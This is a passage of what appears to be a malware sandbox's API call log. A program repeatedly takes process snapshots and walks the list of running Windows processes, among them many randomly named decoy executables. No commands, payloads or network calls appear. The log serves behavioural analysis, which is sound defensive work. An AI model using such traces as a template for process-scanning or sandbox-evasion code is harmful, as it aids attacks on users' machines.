pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0137.433] CloseHandle (hObject=0xbc) returned 1 [0137.433] Sleep (dwMilliseconds=0x12c) [0137.754] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0137.759] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.762] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.768] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0137.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0137.888] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0137.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0137.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0137.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0137.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0137.894] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0137.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0137.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0137.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0137.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0137.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0137.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0137.903] CloseHandle (hObject=0xc4) returned 1 [0137.903] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.908] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0137.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0137.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0137.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0137.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0137.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0137.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0137.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0137.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2a, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0137.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0137.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0137.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0137.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0137.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0137.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0137.985] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0137.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0137.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0137.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0137.990] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0137.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0137.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0137.993] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, 